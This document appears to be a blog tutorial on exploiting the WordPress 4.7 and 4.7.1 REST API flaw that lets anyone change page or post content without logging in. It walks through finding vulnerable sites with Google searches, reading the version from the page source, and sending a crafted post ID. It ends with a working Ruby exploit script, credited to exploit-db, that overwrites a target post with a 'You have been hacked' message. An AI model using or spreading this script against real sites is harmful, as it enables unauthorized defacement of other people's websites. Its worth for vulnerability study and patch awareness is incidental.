WordPress REST API Exploit Step by Step

Vulnerability                     Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability could allow a malicious attacker to modify the content of his post or page on a WP site.

Patched Version              : 4.7.2

Additional Info                     : REST API was added in WP 4.4 released on Dec 2015, however you need plugins to activate API. Later in WP 4.7 version, no plugins are needed, it comes enabled by default. This vulnerability is specific to REST API, hence 4.7.0 and 4.7.1 are directly affected by this vulnerability as API is enabled by default.

 

In this demonstration, we are showing you the exact steps to exploit WordPress websites running vulnerable version 4.7 and 4.7.1. And the tool that I am using here is Advanced Rest Client Chrome add-on.

 

STEP 1: Find OUT Website Running Wordpress

Google is your door, search for something similar to this and I got on hands plenty of WP websites.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.

 

STEP 2: Find VULNERABLE WordPress

View page source of the website to identify the running WP Version. If the version is either 4.7 or 4.7.1, then the website is vulnerable and you can proceed further.

 

STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You need to find out using REST API Client. Here 3 is the post ID of the page shown in STEP 1.

 

STEP 4: Execute Now

You should mention your post ID in the api link. here I mentioned my Post ID 3 as ?id=3ABC

And we got the website hacked!

 

Alternately  you can use following exploit Code 

require ‘rest-client’
require ‘json’
puts “Enter Target URI (With wp directory)”
targeturi = gets.chomp
puts “Enter Post ID”
postid = gets.chomp.to_i
response = RestClient.post(
“#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}”,
{
“id” => “#{postid}justrawdata”,
“title” => “You have been hacked”,
“content” => “Hacked please update your wordpress version”
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts “Done! ‘#{targeturi}/index.php?p=#{postid}'”
else
puts “This site is not Vulnerable”
end

source: exploit-db